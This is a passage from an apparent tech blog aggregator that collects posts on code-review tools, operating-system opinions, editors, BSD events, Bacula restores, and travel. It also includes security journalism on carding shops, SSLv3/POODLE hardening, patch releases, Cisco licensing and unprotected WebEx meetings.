On the other hand, people using webmail or a basic email client might find the approach more cumbersome than a web-based one.

If your only method of tracking contributions is a mailing list, it gets quite easy to lose track of the status of a set. Patches can be neglected, and even the people who wrote them might forget about them for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out automatically whether they eventually get merged.

It is quite basic: it provides a web interface to check the status and a means to update the patch status. The review must happen on the mailing list, and there is no concept of a series.

As basic as it is, it works as a reminder of pending patches, but it tends to get cluttered easily, and keeping it clean requires some effort.

Github approach

The web interface makes it much easier to spot what is pending and what its status is; people used to having everything in the browser (chrome and mozilla can be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer, but the current UIs do not scale to larger (5+) patchsets.

People not living in a browser find switching context quite annoying, and contributing requires additional effort, since you have to register on a website and the process of issuing a patch involves many additional steps, while the email approach just requires typing git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than their Github counterparts. That can be good or bad, since they aren't as immediate and tend to overwhelm new contributors.

You need to make an additional effort to set up your environment, since you need some custom scripts.

Series are tracked with additional precision, but for all practical purposes the usage is the same as github, with an additional burden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

Its basic concept is to be as non-intrusive as possible, retaining all the pros of the simple git+email workflow, like patchwork does.

It already provides additional features, such as the ability to manage series of patches and to track updates to them. It sports a view that breaks out which series require a review and which have been pending for a long time waiting for an update.

What's pending is adding the ability to review directly in the browser, to send the review email from the web to the mailing list, and some more.

I might complete it within the year or by next spring; if you like Flask or Python, contributions are warmly welcome!

Reality Check: Operating Systems

by Jesco Freund via My Universe »

Admittedly: I love flame wars. Especially when it comes to the right™ operating system. In the past I was never at a loss for controversial contributions to such flames either – and let's be honest, whose fingers haven't itched? If, however, I allow myself a look at today's reality when it comes to operating systems, I have to soberly admit that I have, at least in part, lost my license to flame.

In my study alone, five operating systems peacefully share four different devices – the workstation hums along under Arch Linux, but boots Windows 7 when needed (mainly for virtual flying), the MacBook runs – surprise! – OS X, the Sun Blade runs Solaris, and the phone runs Android. If you count the physically off-site machines, two FreeBSD installations (on servers for web, mail, and whatever else comes to mind) and a Linux on the home server join the party.

Commercial vs. Open Source

For many (including myself in an earlier life) this is a moral-religious question and thus not one that allows a pragmatic answer. By now, however, I am convinced that one of the main factors in judging this question lies in one's own financial means. Anyone who cannot or does not want to spend money on software will suspect the ultimate evil in paid offerings, if only because access to them (at least by legal means) is denied to them.

Sure, if I find a good, fitting solution for a problem in the FOSS world, I will use it. But I equally do not forgo commercial software when it simply serves a particular purpose better. In fact, I even prefer it when what I have to give in return (e.g. a license payment) is clearly visible – business models in which a service is supposedly offered to me for free are rather more suspect to me. That does not, of course, apply to genuine FOSS products, but it does apply to (supposedly) free-to-use services.

And, to some extent, it also applies to the free-of-charge distribution of operating systems such as Android or OS X. Or how should one judge Ubuntu Linux in this context? The software itself is open source, but unlike FreeBSD, for example, Ubuntu is not backed by a non-profit foundation; behind it stands Canonical, a company that ultimately has to earn money. Sure, the same applies to Red Hat, but there the business model is transparent and clearly visible.

Faith in Technology

Many arguments speak for or against a particular operating system – I, too, used to believe Linux was inherently superior to Windows, and not only for moral reasons. Over time you learn that there is indeed a "coolness factor" – the nerdier the system, the better. That factor, however, is not necessarily proportional to an operating system's suitability for a particular purpose.

For many tasks in my day-to-day work I use Arch Linux today. Entirely un-nerdy with KDE, and not with one of the much nerdier tiling window managers. The reason is simple: habit. I have grown used to the strengths and weaknesses of this system. The latter in particular is often underestimated: the ability to work around a system's weaknesses is something you have to acquire through long use and experience. And let's be honest: every system has weaknesses, but also strengths.

The personally acquired knowledge of how to deal with strengths and weaknesses is, in my view, another strong motivator in flame wars about operating systems. Being open to other systems simply means putting your own expert status up for debate – even if only to yourself. It also works the other way around: the more broadly your knowledge is spread across many systems, the more balanced and objective your own position becomes – and in the end it is no longer any good for flame wars…

Gone Soft?

Does that now mean I am no longer allowed to rant about certain systems or distributions? Not at all – only the arguments have to be different ones to remain credible. Accordingly, the criticism also turns out less sweeping. My personal list of things I do not like is almost arbitrarily long and hops right across the world of operating systems. Logically, though, the topics related to the system I use most often sit at the top of the list. Here are the top 3:

  • I don't like systemd. Added value over OpenRC or plain init scripts: none that I can see as an end user, but in return rows of problems and unexpected misbehaviour, plus higher complexity in administration.
  • The same goes for PulseAudio, another Poetterism.
  • An old chestnut, by contrast, is the sick code quality of glibc – a sheer nightmare for people who have to write portable C code and hoped they could rely on the POSIX standard.

Although this criticism fully applies to Arch Linux with KDE, I keep using it – the moment another OS took the place of Arch Linux, chances would be good that the order of my personal hate list would change.

Conclusion

In flame wars, arguments are often brought up for why a certain OS is unsuitable for a certain purpose – typically in a not very objective form ("Your own fault, you victim, if you use …."). Asking in such a discussion why system xy is supposedly so well suited for a certain purpose is not only helpful for bringing the discussion back to facts, it can also be wicked fun. Especially if you keep in mind the motivation that presumably underlies the other participants' positions…

Sublime Lives

by Jesco Freund via My Universe »

Those declared dead live longer – that, or something like it, is probably what the makers of Sublime thought. Shortly after swan songs could be heard all over the Internet, a new build was released, number 3065. Granted, that is already almost two months ago by now, but at least it is a sign of life.

What is interesting about the new build: not only were bugs fixed and the Python API (minimally) updated – new features made it into the build as well, sidebar icons among them. Granted, some may argue that this feature was stolen from Atom – I won't deny it; a corresponding plugin has existed for Atom for quite a while.

Speaking of Atom: although it is a good open source alternative to Sublime, the latter is far from out of the race for me. The reason is almost banal: Atom clearly targets OS X users; on the side, it is also reasonably maintainable on Arch Linux thanks to the AUR. Windows users, on the other hand, are systematically neglected.

Sublime, by contrast, offers pre-built binaries for the latter as well – even in a portable version, which makes it particularly attractive for me. After all, I have no administrator rights on my employer's Windows machines, which currently makes installing Atom nearly impossible.

So it remains exciting: will Sublime 3 ever be finished, or will the Atom developers manage to provide a portable Windows version first?

PC-BSD YouTube Channel

by Josh Smith via Official PC-BSD Blog »

Hey everyone, just a quick heads up: we've just started a PC-BSD YouTube channel!  If you want to check it out you can follow this link https://www.youtube.com/channel/UCyd7MaPVUpa-ueUsGjUujag.  Don't forget to subscribe for new videos, and if you have a video or tutorial you'd like to submit, send it my way!  We only have a couple of videos right now, so we need your help to grow our channel :).  Also, we'd love for you to submit ideas for videos we can do in the future.

Thanks!

My ideal editor

by Flameeyes via Flameeyes's Weblog »


Photo credit: Stephen Dann
Some of you have probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year, when Typo decided to start eating my drafts. After that near-meltdown I decided to look for alternatives for writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I had indeed kept using Google Docs until recently, when it started having issues with dead keys. I have been using the US International layout for years, and I'm too used to it even when I write English. If I use a keyboard layout without dead keys, I end up adding spaces where they shouldn't be. So even though switching the layout would work around the problem, I wouldn't want to write a long text that way.

Then I decided to give Evernote another try, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12-month subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while, until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes, because there are trends in editors now! Away goes full-width editing; instead you get a limited-width editing space on a mostly-white canvas with a disappearing interface, like node.js's Ghost, Medium, and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting to me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear: yes, I did use offline editing for a while in the past, as Typo's editor has been overly sensitive to changes too many times. But it does not scale. I'm not always on the same device: not only do I have three computers in my own apartment, I have two more at work, and then I have tablets. It is not uncommon for me to start writing a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post at a conference with my work laptop and then finish it in my room on the personal one, and so on and so forth.

Yes, I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great if you end up having one of the devices offline by mistake — better than the effects it has on password syncs, but not much better. Indeed, I have had bad experiences with that, because it makes it too easy to start working on something completely offline and then forget to resync it before editing it from a different device.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First, they suffer from the same problems stated above with working offline, and second, they don't really support comments as first-class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including them in the page as an external iframe. Not only do I dislike the idea of farming out the comments to a different service in general, I would also be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time in making drafts bulletproof. Client-side offline storage should allow for preserving data even when you get logged out or lose network connection. I know it's not easy (or I would be writing it myself), but it shouldn't be impossible either. Right now it seems the bling is what everybody wants to work on rather than the functionality — it probably is easier to put in your portfolio, and that's as good an explanation as any.

PC-BSD at Ohio Linux Fest

by dru via Official PC-BSD Blog »

Several members of the PC-BSD and FreeBSD Projects will be at Ohio LinuxFest, to be held at the Greater Columbus Convention Center in Columbus, OH on October 24–26. Paid and free registration is available for this event.

Ken Moore will present “Lumina DE: A new desktop environment for PC-BSD” on Friday, October 24 at 11:00. Dru Lavigne will present “A Sneak Peak at FreeNAS 9.3” on Friday, October 24 at 15:00. Dan Langille will present “Virtualization with FreeBSD Jails, ezjail, and ZFS” on Saturday, October 25 at 14:00.

There will be a FreeBSD booth in the expo area. Expo hours are 17:00–19:00 on Friday, October 24 and 8:00–17:00 on Saturday, October 25. As usual, we’ll have cool swag, PC-BSD DVDs, FreeNAS CDs, and will accept donations to the FreeBSD Foundation.

The BSDA certification exam will be available at 16:00 on Saturday, October 25 and at 10:00 on Sunday, October 26. The cost for the exam is $75.

PC-BSD at All Things Open

by dru via Official PC-BSD Blog »

There will be a FreeBSD booth in the expo area of All Things Open, to be held at the Raleigh Convention Center in Raleigh, NC on October 22–23. Registration is required for this event.

Expo hours are from 8:00–17:00 on Wednesday, October 22 and Thursday, October 23. As usual, we’ll have some cool swag, PC-BSD DVDs, FreeNAS CDs, and brochures. We will also accept donations to the FreeBSD Foundation.

Bacula restore using a regex

by Dan Langille via Dan Langille's Other Diary »

Short version: I used this regex when restoring to a jail on the slocum server: !/\.zfs/snapshot/snapshot-for-backup/!/!

Background: Today I did this when setting up an ssh-key on a new host: ssh-add -L > ~/.ssh/authorized_keys Oh. That should have been >>.

Restoring: During the Bacula restore, I need to change this path: /usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/ to /usr/jails/mydev/usr/home/dan/.ssh/ That [...]
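
If I read Bacula's RegexWhere semantics correctly, the expression above is a sed-style !search!replacement! substitution applied to each restored path, which strips the snapshot prefix. Purely as an illustration, here is a minimal Python sketch of the same rewrite (the paths are the ones from the post; the sed-style interpretation is my assumption):

import re

# The Bacula expression !/\.zfs/snapshot/snapshot-for-backup/!/! uses '!' as the
# delimiter: the search pattern is on the left, the replacement on the right.
pattern     = r"/\.zfs/snapshot/snapshot-for-backup/"
replacement = "/"

backed_up = "/usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/"
restored  = re.sub(pattern, replacement, backed_up)

print(restored)  # -> /usr/jails/mydev/usr/home/dan/.ssh/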

Seleznev Arrest Explains ‘2Pac’ Downtime

by BrianKrebs via Krebs on Security »

The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

The 2pac[dot]cc credit card shop.
The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician. Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

“Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.
IT’S ALL ABOUT CUSTOMER SERVICE

2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.
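
As a quick sanity check of the shares quoted above, here is a trivial Python sketch that recomputes them from the figures cited from the Group-IB report (numbers as stated in this post):

# Figures quoted above from the Group-IB report on swiped1[dot]su
contributed = 5_306_024   # cards Rescator supplied to the shop over the years
sold        = 151_720     # cards that were actually sold
expired     = 421_801     # cards that expired before they could be sold
declined    = 42_626      # sold cards that came back declined by the site's checker

print(f"sold share:     {sold / contributed:.2%}")     # share of contributed cards that sold
print(f"expired share:  {expired / contributed:.2%}")  # share that expired unsold
print(f"declined share: {declined / sold:.2%}")        # share of sold cards that were declined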

The swiped1[dot]su login page.
Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time. One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.

SSLv3

by Dag-Erling Smørgrav via May Contain Traces of Bolts »

UPDATE 2014-10-14 23:40 UTC The details have been published: meet the SSL POODLE attack.

UPDATE 2014-10-15 11:15 UTC Simpler server test method, corrected info about browsers

UPDATE 2014-10-15 16:00 UTC More information about client testing

El Reg posted an article earlier today about a purported flaw in SSL 3.0 which may or may not be real, but it’s been a bad year for SSL, we’re all on edge, and we’d rather be safe than sorry. So let’s take it at face value and see what we can do to protect ourselves. If nothing else, it will force us to inspect our systems and make conscious decisions about their configuration instead of trusting the default settings. What can we do?

The answer is simple: there is no reason to support SSL 3.0 these days. TLS 1.0 is fifteen years old and supported by every browser that matters and over 99% of websites. TLS 1.1 and TLS 1.2 are eight and six years old, respectively, and are supported by the latest versions of all major browsers (except for Safari on Mac OS X 10.8 or older), but are not as widely supported on the server side. So let’s disable SSL 2.0 and 3.0 and make sure that TLS 1.0, 1.1 and 1.2 are enabled.

What to do next

Test your server

The Qualys SSL Labs SSL Server Test analyzes a server and calculates a score based on the list of supported protocols and algorithms, the strength and validity of the server certificate, which mitigation techniques are implemented, and many other factors. It takes a while, but is well worth it. Anything less than a B is a disgrace.

If you’re in a hurry, the following command will attempt to connect to your server using SSL 3.0:

:|openssl s_client -ssl3 -connect www.example.net:443
If the last line it prints is DONE, you have work to do.
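
If you would rather script that check, here is a rough Python sketch of the same test. It assumes your local OpenSSL build still has SSLv3 compiled in (otherwise stick with the openssl command above), and www.example.net is just the placeholder host from that command:

import socket
import ssl

def accepts_sslv3(host, port=443):
    """Return True if the server completes an SSLv3-only handshake."""
    # ssl.PROTOCOL_SSLv3 is only present when the local OpenSSL still supports SSLv3.
    proto = getattr(ssl, "PROTOCOL_SSLv3", None)
    if proto is None:
        raise RuntimeError("local OpenSSL lacks SSLv3 support; use openssl s_client -ssl3 instead")
    ctx = ssl.SSLContext(proto)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with socket.create_connection((host, port), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return True   # handshake succeeded: the server still accepts SSLv3
    except (ssl.SSLError, ConnectionResetError):
        return False          # handshake refused: SSLv3 appears to be disabled

if __name__ == "__main__":
    print(accepts_sslv3("www.example.net"))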

Fix your server

Disable SSL 2.0 and 3.0 and enable TLS 1.0, 1.1 and 1.2 and forward secrecy (ephemeral Diffie-Hellman).

For Apache users, the following line goes a long way:

SSLProtocol ALL -SSLv3 -SSLv2
It disables SSL 2.0 and 3.0, but does not modify the algorithm preference list, so your server may still prefer older, weaker ciphers and hashes over more recent, stronger ones. Nor does it enable Forward Secrecy.

The Mozilla wiki has an excellent guide for the most widely used web servers and proxies.

Test your client

The Poodle Test website will show you a picture of a poodle if your browser is vulnerable and a terrier otherwise. It is the easiest, quickest way I know of to test your client.

Qualys SSL Labs also have an SSL Client Test which does much the same for your client as the SSL Server Test does for your server; unfortunately, it is not able to reliably determine whether your browser supports SSL 3.0.

Fix your client

On Windows, use the Advanced tab in the Internet Properties dialog (confusingly not searchable by that name, search for “internet options” or “proxy server” instead) to disable SSL 2.0 and 3.0 for all browsers.

On Linux and BSD:

  • Firefox: open about:config and set security.tls.version.min to 1. You can force this setting for all users by adding lockPref("security.tls.version.min", 1); to your system-wide Mozilla configuration file. Support for SSL 3.0 will be removed in the next release.

  • Chrome: open the settings page and select “show advanced settings”. There is an HTTPS/SSL section, but there is apparently no way to disable SSL 3.0 from there. Support for SSL 3.0 will be removed in the next release.

I do not have any information about Safari and Opera. Please comment (or email me) if you know how to disable SSL 3.0 in these browsers.

Good luck, and stay safe.

Removal of the Ubuntu-Touch code from Trojita git

by via jkt's blog »

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to stop working with upstream and instead focus on a standalone, long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem, and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

One month in Turkey

by ultrabug via Ultrabug »

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, road works)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)
Turkish customs are very friendly and polite; it's really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 km to our brave and astonishing Harley-Davidson Nightster. We encountered no problems at all with the bike even though we clearly didn't go easy on her. We rode on gravel, dirt and mud without her complaining, not to mention the weight of our luggage and the passengers.

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can't describe well enough the feeling of pleasure and freedom you get when travelling by motorbike, so I hope these first photos will give you an idea.

I have to admit that it's really impressive to leave your bike alone among the numerous trucks parking and loading/unloading their stuff a few centimeters from it.

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

Kos is quite a big island that you can discover best by … riding around!

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

This is a view from the Bozburun bay. Two photos for two bike layouts: beach version and fully loaded version.

On the way to Cappadocia, near Karapinar:

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.

Microsoft, Adobe Push Critical Security Fixes

by BrianKrebs via Krebs on Security »

Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today are available at this link.

Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

July–September, 2014 Status Report

by Webmaster Team via FreeBSD News Flash »

The July–September, 2014 Status Report is now available.

The New Cisco AnyConnect Licensing

by Karsten via Security-Planet.de »

A big advantage of the Cisco remote-access VPN solution used to be that the licensing was fairly simple and you did not have to pay per PC on which the AnyConnect client was installed. Of course there were annoyances too, e.g. that AnyConnect Essentials and AnyConnect Premium could not be mixed.

With the current changes for the new AnyConnect 4, the latter will now be possible, but the licensing model as a whole becomes considerably more complex. What changes:
There are three new license tiers:

  • Plus Subscription
  • Plus Perpetual
  • Apex Subscription
Subscription means that the license can be purchased with terms of one, three or five years. The licensing of the headend termination device (e.g. the ASA) is independent of this.
AnyConnect Plus includes the following features:

  • VPN
  • per-app VPN (new in v4)
  • Web Security for CWS and WSA
  • Network Access Manager
With the exception of the new "per-app VPN", this looks pretty much like the existing feature set.
The new AnyConnect Apex license adds the following features:

  • Posture
    This existed before; what is new is that the AnyConnect client can now also be used for the ISE, starting with the upcoming version 1.3. The old NAC posture agent is no longer needed. This change has been long overdue. Remarkable that at this year's Cisco Networkers a Cisco employee still told me that this was not to be expected in the foreseeable future.
  • Next Generation Crypto / Suite B
    Many words come to mind for companies that charge extra for decent crypto. But they could all have an impact on a potential age rating of this site …
  • Clientless VPN
    What used to be licensed via AnyConnect Premium on the headend device is now tied to the client license.
With the new AnyConnect, every client needs a license:

The number of Cisco AnyConnect licenses needed is based on all the possible unique users that may use any Cisco AnyConnect service. The exact number of Plus or Apex licenses should be based on the total number of unique users that require the specific services associated with each license type.

The smallest license tier is now for 25 clients. For my setup with two Macs, each running three VMs with XP/Win7/Win8, I already need eight licenses.

What was long overdue is that different versions can now be mixed:

Cisco AnyConnect Apex and Plus licenses can be mixed in the same environment.
The number of Plus licenses can be smaller or greater than the number of Apex licenses.

License management may still bring us a few "challenges" …

When a Cisco ASA is used Cisco AnyConnect, your production activation key (PAK) for Plus or Apex must be registered to the serial number of each individual Cisco ASA via the Cisco License Management portal.

How the exact handling will work, especially in scenarios where one client connects to many different ASAs, remains to be seen. I hope there won't be any problems with that.

The detailed description of the new license model can be found in the Cisco AnyConnect Ordering Guide.

Who’s Watching Your WebEx?

by BrianKrebs via Krebs on Security »

KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

Department of Energy’s WebEx meetings.
At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even allowed access to archived event recordings.

Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

“In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

“If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.

S390 documentation in the Gentoo Wiki

by Raúl Porcel via Armin76's Blog »

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there weren't any materials available for installing Gentoo on an S390 system without having to rely on an already installed distribution.
